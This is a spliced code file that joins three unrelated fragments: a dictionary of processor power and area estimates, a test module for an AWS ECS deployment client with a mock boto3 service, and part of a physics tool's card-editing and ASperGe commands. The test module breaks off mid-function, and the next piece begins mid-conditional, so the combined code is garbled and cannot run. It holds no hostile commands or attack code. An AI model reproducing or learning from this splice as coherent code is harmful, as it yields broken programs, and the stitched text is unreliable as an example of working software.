'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00166267,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00150066,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000609628,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000744144,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00557015,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0140668,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0497989,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.16764,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.162142,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.169139,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.53989,
'Instruction Fetch Unit/Runtime Dynamic': 0.400717,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0266781,
'L2/Runtime Dynamic': 0.00533784,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.71937,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.714833,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0479543,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0479543,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.94582,
'Load Store Unit/Runtime Dynamic': 0.999282,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.118247,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.236494,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0419663,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0423532,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.196952,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0266213,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.425152,
'Memory Management Unit/Runtime Dynamic': 0.0689745,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 16.9434,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0814145,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00852509,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0834124,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
<reponame>burningmantech/ranger-deploy
##
# See the file COPYRIGHT for copyright information.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
"""
Tests for :mod:`deploy.aws.ecs`
"""
from contextlib import contextmanager
from copy import deepcopy
from os import chdir, environ, getcwd
from os.path import dirname
from typing import (
Any,
Callable,
ClassVar,
Dict,
Iterator,
List,
Mapping,
Optional,
Sequence,
Set,
Tuple,
Type,
cast,
)
from attr import Attribute, attrib, attrs
from hypothesis import assume, given
from hypothesis.strategies import (
booleans,
characters,
composite,
dictionaries,
integers,
just,
lists,
one_of,
sampled_from,
sets,
text,
tuples,
)
from twisted.trial.unittest import SynchronousTestCase as TestCase
import deploy.notify.smtp
from deploy.ext.click import clickTestRun
from deploy.ext.hypothesis import (
ascii_text,
commitIDs,
email_addresses,
image_names,
image_repository_names,
port_numbers,
repository_ids,
user_names,
)
from deploy.notify.smtp import SMTPNotifier
from .test_ecr import ECRServiceClient, testingECRServiceClient
from .. import ecs
from ..ecs import (
ECSServiceClient,
NoChangesError,
NoSuchServiceError,
TaskDefinition,
TaskEnvironment,
TaskEnvironmentUpdates,
)
__all__ = ()
def environment_updates(
min_size: int = 0, max_size: Optional[int] = None
) -> Mapping[str, str]:
return cast(
Mapping[str, str],
dictionaries(
text(min_size=1),
text(),
min_size=min_size,
max_size=max_size,
),
)
@composite
def set_unset_envs(draw: Callable) -> Tuple[Dict[str, str], Set[str]]:
updates = draw(environment_updates(min_size=1))
removes = draw(sets(elements=just(tuple(updates.keys()))))
return (updates, removes)
@attrs(auto_attribs=True)
class MockBoto3ECSClient:
"""
Mock Boto3 ECS client backed by class-level dictionaries of task definitions and services.
"""
#
# Class attributes
#
_sampleClusterStaging: ClassVar = "staging-cluster"
_sampleServiceStaging: ClassVar = "staging-service-fg"
_sampleClusterProduction: ClassVar = "production-cluster"
_sampleServiceProduction: ClassVar = "production-service-fg"
_defaultARNNamespace: ClassVar = "arn:mock:task-definition/service"
_defaultCompatibilities: ClassVar[Sequence[str]] = ["EC2", "FARGATE"]
_defaultRequiresAttributes: ClassVar[Sequence[Mapping[str, str]]] = [
{"name": "ecs.capability.execution-role-ecr-pull"},
{"name": "com.amazonaws.ecs.capability.ecr-auth"},
{"name": "com.amazonaws.ecs.capability.task-iam-role"},
]
_defaultTaskDefinitions: ClassVar[Sequence[TaskDefinition]] = [
{
"taskDefinitionArn": f"{_defaultARNNamespace}:0",
"family": "service-fg",
"revision": 1,
"registeredAt": 1234,
"registeredBy": "?",
"containerDefinitions": [
{
"name": "service-container",
"image": "/team/service-project:1000",
"cpu": 0,
"memory": 128,
"portMappings": [
{
"containerPort": 80,
"hostPort": 80,
"protocol": "tcp",
},
],
"essential": True,
"environment": ECSServiceClient._environmentAsJSON(
{
"version": "0",
"happiness": "true",
}
),
"mountPoints": [],
"volumesFrom": [],
},
],
"taskRoleArn": "arn:mock:role/ecsTaskExecutionRole",
"executionRoleArn": "arn:mock:role/ecsTaskExecutionRole",
"networkMode": "awsvpc",
"volumes": [],
"status": "ACTIVE",
"requiresAttributes": deepcopy(_defaultRequiresAttributes),
"placementConstraints": [],
"compatibilities": list(_defaultCompatibilities),
"requiresCompatibilities": ["FARGATE"],
"cpu": "256",
"memory": "512",
},
{
"taskDefinitionArn": f"{_defaultARNNamespace}:1",
"family": "service-fg",
"revision": 1,
"registeredAt": 1234,
"registeredBy": "?",
"containerDefinitions": [
{
"name": "service-container",
"image": "/team/service-project:1001",
"cpu": 0,
"memory": 128,
"portMappings": [
{
"containerPort": 80,
"hostPort": 80,
"protocol": "tcp",
},
],
"essential": True,
"environment": ECSServiceClient._environmentAsJSON(
{
"version": "0",
"happiness": "true",
"VARIABLE1": "value1",
"VARIABLE2": "value2",
}
),
"mountPoints": [],
"volumesFrom": [],
},
],
"taskRoleArn": "arn:mock:role/ecsTaskExecutionRole",
"executionRoleArn": "arn:mock:role/ecsTaskExecutionRole",
"networkMode": "awsvpc",
"volumes": [],
"status": "ACTIVE",
"requiresAttributes": deepcopy(_defaultRequiresAttributes),
"placementConstraints": [],
"compatibilities": list(_defaultCompatibilities),
"requiresCompatibilities": ["FARGATE"],
"cpu": "256",
"memory": "512",
},
]
_taskDefinitions: ClassVar[Dict[str, TaskDefinition]] = {}
_services: ClassVar[Dict[str, Dict[str, str]]] = {}
@classmethod
def _addDefaultTaskDefinitions(cls) -> None:
for taskDefinition in cls._defaultTaskDefinitions:
cls._taskDefinitions[
taskDefinition["taskDefinitionArn"]
] = deepcopy(taskDefinition)
@classmethod
def _defaultTaskARNs(cls) -> Sequence[str]:
return [
taskDefinition["taskDefinitionArn"]
for taskDefinition in cls._defaultTaskDefinitions
]
@classmethod
def _clearTaskDefinitions(cls) -> None:
cls._taskDefinitions.clear()
@classmethod
def _addCluster(cls, cluster: str) -> None:
if cluster in cls._services: # pragma: no cover
raise AssertionError(f"Cluster {cluster!r} already exists")
cls._services[cluster] = {}
@classmethod
def _addService(cls, cluster: str, service: str, arn: str) -> None:
if service in cls._services[cluster]: # pragma: no cover
raise AssertionError(
f"Service {service!r} already exists in cluster {cluster!r}"
)
cls._services[cluster][service] = arn
@classmethod
def _addDefaultServices(cls) -> None:
cls._addCluster(cls._sampleClusterStaging)
cls._addService(
cls._sampleClusterStaging,
cls._sampleServiceStaging,
cls._defaultTaskARNs()[-1],
)
cls._addCluster(cls._sampleClusterProduction)
cls._addService(
cls._sampleClusterProduction,
cls._sampleServiceProduction,
cls._defaultTaskARNs()[-1],
)
@classmethod
def _clearServices(cls) -> None:
cls._services.clear()
@classmethod
def _currentTaskARN(cls, cluster: str, service: str) -> str:
if cluster not in cls._services: # pragma: no cover
raise AssertionError(
f"Cluster {cluster!r} not in {cls._services.keys()}"
)
if service not in cls._services[cluster]: # pragma: no cover
raise AssertionError(
f"Service {service!r} not in {cls._services[cluster].keys()}"
)
return cls._services[cluster][service]
@classmethod
def _setCurrentTaskARN(cls, cluster: str, service: str, arn: str) -> None:
cls._services[cluster][service] = arn
@classmethod
def _currentTaskDefinition(
cls, cluster: str, service: str
) -> TaskDefinition:
return cls._taskDefinitions[cls._currentTaskARN(cluster, service)]
@classmethod
def _currentContainerDefinition(
cls, cluster: str, service: str
) -> Mapping[str, Any]:
return cast(
Mapping[str, Any],
(
cls._currentTaskDefinition(cluster, service)[
"containerDefinitions"
][0]
),
)
@classmethod
def _currentImageName(cls, cluster: str, service: str) -> str:
return cast(
str, cls._currentContainerDefinition(cluster, service)["image"]
)
@classmethod
def _currentEnvironment(cls, cluster: str, service: str) -> TaskEnvironment:
return ECSServiceClient._environmentFromJSON(
cls._currentContainerDefinition(cluster, service)["environment"]
)
#
# Instance attributes
#
_awsService: str = attrib()
@_awsService.validator
def _validate_service(self, attribute: Attribute, value: Any) -> None:
assert value == "ecs"
def describe_task_definition(
self, taskDefinition: str
) -> Mapping[str, TaskDefinition]:
return {"taskDefinition": self._taskDefinitions[taskDefinition]}
def list_task_definitions(
self, familyPrefix: str
) -> Mapping[str, Sequence[str]]:
return {
"taskDefinitionArns": list(
t["taskDefinitionArn"]
for t in self._taskDefinitions.values()
if t["family"].startswith(familyPrefix)
)
}
def register_task_definition(
self, **taskDefinition: Any
) -> Mapping[str, TaskDefinition]:
# Come up with a new task ARN
maxVersion = 0
for arn in self._taskDefinitions:
version = int(arn.split(":")[-1])
if version > maxVersion:
maxVersion = version
arn = f"{self._defaultARNNamespace}:{maxVersion + 1}"
taskDefinition["taskDefinitionArn"] = arn
taskDefinition["revision"] = maxVersion + 1
taskDefinition["status"] = "ACTIVE"
taskDefinition["compatibilities"] = self._defaultCompatibilities
taskDefinition["requiresAttributes"] = self._defaultRequiresAttributes
self._taskDefinitions[arn] = taskDefinition
return {"taskDefinition": taskDefinition}
def describe_services(
self, cluster: str, services: Sequence[str]
) -> Mapping[str, Sequence[Mapping[str, str]]]:
return {
"services": [
{"taskDefinition": self._currentTaskARN(cluster, service)}
for service in services
if service in self._services[cluster]
],
}
def update_service(
self, cluster: str, service: str, taskDefinition: str
) -> None:
assert taskDefinition in self._taskDefinitions
self._setCurrentTaskARN(cluster, service, taskDefinition)
@contextmanager
def testingBoto3ECS() -> Iterator[None]:
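"""
Context manager that seeds MockBoto3ECSClient with the default task
definitions and services, points ecs.boto3Client at the mock class, then
restores the real client factory and clears the mock state on exit.
"""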
MockBoto3ECSClient._addDefaultTaskDefinitions()
MockBoto3ECSClient._addDefaultServices()
boto3Client = ecs.boto3Client
ecs.boto3Client = MockBoto3ECSClient
try:
yield
finally:
ecs.boto3Client = boto3Client
MockBoto3ECSClient._clearServices()
MockBoto3ECSClient._clearTaskDefinitions()
class ECSServiceClientTests(TestCase):
"""
Tests for :class:`ECSServiceClient`
"""
def test_environmentAsJSON(self) -> None:
with testingBoto3ECS():
self.assertEqual(
ECSServiceClient._environmentAsJSON({"foo": "bar", "x": "1"}),
[{"name": "foo", "value": "bar"}, {"name": "x", "value": "1"}],
)
def test_environmentFromJSON(self) -> None:
with testingBoto3ECS():
self.assertEqual(
ECSServiceClient._environmentFromJSON(
[
{"name": "foo", "value": "bar"},
{"name": "x", "value": "1"},
]
),
{"foo": "bar", "x": "1"},
)
def test_aws(self) -> None:
"""
:meth:`ECSServiceClient._aws` property returns an AWS client.
"""
with testingBoto3ECS():
client = ECSServiceClient(
cluster=MockBoto3ECSClient._sampleClusterStaging,
service=MockBoto3ECSClient._sampleServiceStaging,
)
self.assertIsInstance(client._aws, MockBoto3ECSClient)
def test_currentTaskARN(self) -> None:
"""
:meth:`ECSServiceClient.currentTaskARN` returns the ARN of the current
task.
"""
with testingBoto3ECS():
client = ECSServiceClient(
cluster=MockBoto3ECSClient._sampleClusterStaging,
service=MockBoto3ECSClient._sampleServiceStaging,
)
arn = client.currentTaskARN()
self.assertEqual(
arn,
client._aws._currentTaskARN(client.cluster, client.service),
)
def test_currentTaskARN_noSuchService(self) -> None:
"""
:meth:`ECSServiceClient.currentTaskARN` raises
:exc:`NoSuchServiceError` when the service doesn't exist.
"""
with testingBoto3ECS():
doesntExistService = "xyzzy"
client = ECSServiceClient(
cluster=MockBoto3ECSClient._sampleClusterStaging,
service=doesntExistService,
)
e = self.assertRaises(NoSuchServiceError, client.currentTaskARN)
self.assertEqual(e.service, doesntExistService)
def test_currentTaskDefinition(self) -> None:
with testingBoto3ECS():
client = ECSServiceClient(
cluster=MockBoto3ECSClient._sampleClusterStaging,
service=MockBoto3ECSClient._sampleServiceStaging,
)
taskDefinition = client.currentTaskDefinition()
self.assertIsInstance(taskDefinition, dict)
self.assertTrue(taskDefinition.get("family"))
self.assertTrue(taskDefinition.get("revision"))
self.assertTrue(taskDefinition.get("containerDefinitions"))
self.assertIn("FARGATE", taskDefinition.get("compatibilities", []))
def test_currentImageName(self) -> None:
with testingBoto3ECS():
client = ECSServiceClient(
cluster=MockBoto3ECSClient._sampleClusterStaging,
service=MockBoto3ECSClient._sampleServiceStaging,
)
imageName = client.currentImageName()
self.assertEqual(
imageName,
client._aws._currentImageName(client.cluster, client.service),
)
@given(integers(min_value=2))
def test_updateTaskDefinition_updated(self, tag: int) -> None:
with testingBoto3ECS():
client = ECSServiceClient(
cluster=MockBoto3ECSClient._sampleClusterStaging,
service=MockBoto3ECSClient._sampleServiceStaging,
)
repo, oldTag = client.currentImageName().split(":")
assume(int(oldTag) != tag)
newImageName = f"{repo}:{tag}"
newTaskDefinition = client.updateTaskDefinition(
imageName=newImageName
)
self.assertEqual(
client._taskImageName(newTaskDefinition), newImageName
)
def test_updateTaskDefinition_none(self) -> None:
with testingBoto3ECS():
client = ECSServiceClient(
cluster=MockBoto3ECSClient._sampleClusterStaging,
service=MockBoto3ECSClient._sampleServiceStaging,
)
self.assertRaises(NoChangesError, client.updateTaskDefinition)
def test_updateTaskDefinition_same(self) -> None:
with testingBoto3ECS():
client = ECSServiceClient(
cluster=MockBoto3ECSClient._sampleClusterStaging,
service=MockBoto3ECSClient._sampleServiceStaging,
)
self.assertRaises(
NoChangesError,
client.updateTaskDefinition,
imageName=client.currentImageName(),
)
@given(environment_updates(min_size=1))
def test_updateTaskDefinition_updateEnvironment(
self, newEnvironment: TaskEnvironment
) -> None:
with testingBoto3ECS():
client = ECSServiceClient(
cluster=MockBoto3ECSClient._sampleClusterStaging,
service=MockBoto3ECSClient._sampleServiceStaging,
)
# TRAVIS environment variable makes Travis-CI things happen which
# we aren't testing for here.
assume("TRAVIS" not in newEnvironment)
newTaskDefinition = client.updateTaskDefinition(
environment=newEnvironment
)
updatedEnvironment = dict(
client._environmentFromJSON(
newTaskDefinition["containerDefinitions"][0]["environment"]
)
)
expectedEnvironment = dict(newEnvironment)
# TASK_UPDATED is inserted during updates.
self.assertIn("TASK_UPDATED", updatedEnvironment)
expectedEnvironment["TASK_UPDATED"] = updatedEnvironment[
"TASK_UPDATED"
]
self.assertEqual(updatedEnvironment, expectedEnvironment)
@given(
ascii_text(min_size=1), # project
repository_ids(), # repository
integers(), # buildNumber
ascii_text(min_size=1), # buildURL
commitIDs(), # commitID
ascii_text(min_size=1), # commitMessage
)
def test_updateTaskDefinition_ci(
self,
project: str,
repository: str,
buildNumber: int,
buildURL: str,
commitID: str,
commitMessage: str,
) -> None:
with testingBoto3ECS():
client = ECSServiceClient(
cluster=MockBoto3ECSClient._sampleClusterStaging,
service=MockBoto3ECSClient._sampleServiceStaging,
)
# Patch the (local) system environment to emulate CI
ciEnvironment = {
"BUILD_NUMBER": str(buildNumber),
"BUILD_URL": buildURL,
"COMMIT_ID": "0" * 40,
"COMMIT_MESSAGE": commitMessage,
"PROJECT_NAME": project,
"REPOSITORY_ID": repository,
}
self.patch(ecs, "environ", ciEnvironment)
# Make an unrelated change to avoid NoChangesError
newTaskDefinition = client.updateTaskDefinition(
imageName=f"{client.currentImageName()}4027"
)
updatedEnvironment = dict(
client._environmentFromJSON(
newTaskDefinition["containerDefinitions"][0]["environment"]
)
)
expectedEnvironment = dict(
client._aws._currentEnvironment(client.cluster, client.service)
)
expectedEnvironment.update(
{(f"CI_{k}", v) for (k, v) in ciEnvironment.items()}
)
# TASK_UPDATED is inserted during updates.
== '--clean':
ff = open(path,'w')
ff.write("# %s \n" % card)
ff.write("%s \n" % line.split(None,2)[2])
ff.close()
logger.info("writing the line in %s (empty file) the line: \"%s\"" %(card, line.split(None,2)[2] ),'$MG:BOLD')
elif args[1].startswith('--line_position=afterlast'):
#position in file determined by user
text = open(path).read()
split = text.split('\n')
if self.last_editline_pos > 0:
pos = self.last_editline_pos +1
newline = line.split(None,2)[2]
split.insert(pos, newline)
ff = open(path,'w')
ff.write('\n'.join(split))
logger.info("writting at line %d of the file %s the line: \"%s\"" %(pos, card, line.split(None,2)[2] ),'$MG:BOLD')
self.last_editline_pos = pos
elif args[1].startswith('--line_position='):
#position in file determined by user
text = open(path).read()
split = text.split('\n')
pos = int(args[1].split('=',1)[1])
newline = line.split(None,2)[2]
split.insert(pos, newline)
ff = open(path,'w')
ff.write('\n'.join(split))
logger.info("writting at line %d of the file %s the line: \"%s\"" %(pos, card, line.split(None,2)[2] ),'$MG:BOLD')
self.last_editline_pos = pos
elif args[1].startswith(('--after_line=banner','--after_line=\'banner\'','--after_line=\"banner\"')):
# write the line at the first not commented line
text = open(path).read()
split = text.split('\n')
for posline,l in enumerate(split):
if not l.startswith('#'):
break
split.insert(posline, line.split(None,2)[2])
ff = open(path,'w')
ff.write('\n'.join(split))
logger.info("writting at line %d of the file %s the line: \"%s\"" %(posline, card, line.split(None,2)[2] ),'$MG:BOLD')
self.last_editline_pos = posline
elif args[1].startswith('--replace_line='):
# catch the line/regular expression and replace the associated line
# if no line matches, check whether the remaining text (args[2]) holds another instruction starting with --
text = open(path).read()
split = text.split('\n')
search_pattern=r'''replace_line=(?P<quote>["'])(?:(?=(\\?))\2.)*?\1'''
pattern = '^\s*' + re.search(search_pattern, line).group()[14:-1]
for posline,l in enumerate(split):
if re.search(pattern, l):
break
else:
new_line = re.split(search_pattern,line)[-1].strip()
if new_line.startswith(('--before_line=','--after_line')):
return self.do_add('%s %s' % (args[0], new_line))
raise Exception('invalid regular expression: not found in file')
# found the line position "posline"
# need to check if a fail-safe redirection (--before_line/--after_line) is present
new_line = re.split(search_pattern,line)[-1].strip()
if new_line.startswith(('--before_line=','--after_line')):
search_pattern=r'''(?:before|after)_line=(?P<quote>["'])(?:(?=(\\?))\2.)*?\1'''
new_line = re.split(search_pattern,new_line)[-1]
# overwrite the previous line
old_line = split[posline]
split[posline] = new_line
ff = open(path,'w')
ff.write('\n'.join(split))
logger.info("Replacing the line \"%s\" [line %d of %s] by \"%s\"" %
(old_line, posline, card, new_line ),'$MG:BOLD')
self.last_editline_pos = posline
elif args[1].startswith('--comment_line='):
# catch the line/regular expression and comment out every matching line
# if no line matches, emit a warning and leave the content unchanged
text = open(path).read()
split = text.split('\n')
search_pattern=r'''comment_line=(?P<quote>["'])(?:(?=(\\?))\2.)*?\1'''
pattern = '^\s*' + re.search(search_pattern, line).group()[14:-1]
nb_mod = 0
for posline,l in enumerate(split):
if re.search(pattern, l):
split[posline] = '#%s' % l
nb_mod +=1
logger.info("Commenting line \"%s\" [line %d of %s]" %
(l, posline, card ),'$MG:BOLD')
# overwrite the previous line
if not nb_mod:
logger.warning('no line commented (no line matching)')
ff = open(path,'w')
ff.write('\n'.join(split))
self.last_editline_pos = posline
elif args[1].startswith('--before_line='):
# catch the line/regular expression and write before that line
text = open(path).read()
split = text.split('\n')
search_pattern=r'''before_line=(?P<quote>["'])(?:(?=(\\?))\2.)*?\1'''
pattern = '^\s*' + re.search(search_pattern, line).group()[13:-1]
for posline,l in enumerate(split):
if re.search(pattern, l):
break
else:
raise Exception('invalid regular expression: not found in file')
split.insert(posline, re.split(search_pattern,line)[-1])
ff = open(path,'w')
ff.write('\n'.join(split))
logger.info("writting at line %d of the file %s the line: \"%s\"" %(posline, card, line.split(None,2)[2] ),'$MG:BOLD')
self.last_editline_pos = posline
elif args[1].startswith('--after_line='):
# catch the line/regular expression and write after that line
text = open(path).read()
split = text.split('\n')
search_pattern = r'''after_line=(?P<quote>["'])(?:(?=(\\?))\2.)*?\1'''
pattern = '^\s*' + re.search(search_pattern, line).group()[12:-1]
for posline,l in enumerate(split):
if re.search(pattern, l):
break
else:
posline=len(split)
split.insert(posline+1, re.split(search_pattern,line)[-1])
ff = open(path,'w')
ff.write('\n'.join(split))
logger.info("writting at line %d of the file %s the line: \"%s\"" %(posline+1, card, line.split(None,2)[2] ),'$MG:BOLD')
self.last_editline_pos = posline+1
else:
ff = open(path,'a')
ff.write("%s \n" % line.split(None,1)[1])
ff.close()
logger.info("adding at the end of the file %s the line: \"%s\"" %(card, line.split(None,1)[1] ),'$MG:BOLD')
self.last_editline_pos = -1
self.reload_card(path)
do_edit = do_add
complete_edit = complete_add
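# Illustrative, hypothetical invocations of the card-editing command handled by
# do_add/do_edit above (card names, patterns and replacement text below are
# placeholders inferred from the option parsing, not commands taken from this
# codebase):
#   add run_card --after_line="nevents" 100 = new_parameter
#   edit param_card --replace_line="^\s*DECAY +6" DECAY 6 1.50834
#   edit run_card --comment_line="cut_decays"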
def help_asperge(self):
"""Help associated to the asperge command"""
signal.alarm(0)
print('-- syntax: asperge [options]')
print(' Call ASperGe to diagonalize all mass matrices in the model.')
print(' This works only if the ASperGE module is part of the UFO model (a subdirectory).')
print(' If you specify some names after the command (i.e. asperge m1 m2) then ASperGe will only')
print(' diagonalize the associate mass matrices (here m1 and m2).')
def complete_asperge(self, text, line, begidx, endidx, formatting=True):
prev_timer = signal.alarm(0) # avoid timer if any
if prev_timer:
nb_back = len(line)
self.stdout.write('\b'*nb_back + '[timer stopped]\n')
self.stdout.write(line)
self.stdout.flush()
blockname = list(self.pname2block.keys())
# remove those that we know for sure are not mixing
wrong = ['decay', 'mass', 'sminput']
valid = [k for k in blockname if 'mix' in k]
potential = [k for k in blockname if k not in valid+wrong]
output = {'Mixing matrices': self.list_completion(text, valid, line),
'Other potential valid input': self.list_completion(text, potential, line)}
return self.deal_multiple_categories(output, formatting)
def do_asperge(self, line):
"""Running ASperGe"""
signal.alarm(0) # avoid timer if any
# ensure that the card is in sync
if 'param' in self.modified_card:
self.write_card('param')
self.modified_card.discard('param')
path = pjoin(self.me_dir,'bin','internal','ufomodel','ASperGE')
if not os.path.exists(path):
logger.error('ASperge has not been detected in the current model, therefore it will not be run.')
return
elif not os.path.exists(pjoin(path,'ASperGe')):
logger.info('ASperGe has been detected but is not compiled. Running the compilation now.')
try:
misc.compile(cwd=path,shell=True)
except MadGraph5Error as error:
logger.error('''ASperGe failed to compile. Note that gsl is needed
for this compilation to go through. More information on how to install this package on
http://www.gnu.org/software/gsl/
Full compilation log is available at %s''' % pjoin(self.me_dir, 'ASperge_compilation.log'))
open(pjoin(self.me_dir, 'ASperge_compilation.log'),'w').write(str(error))
return
opts = line.split()
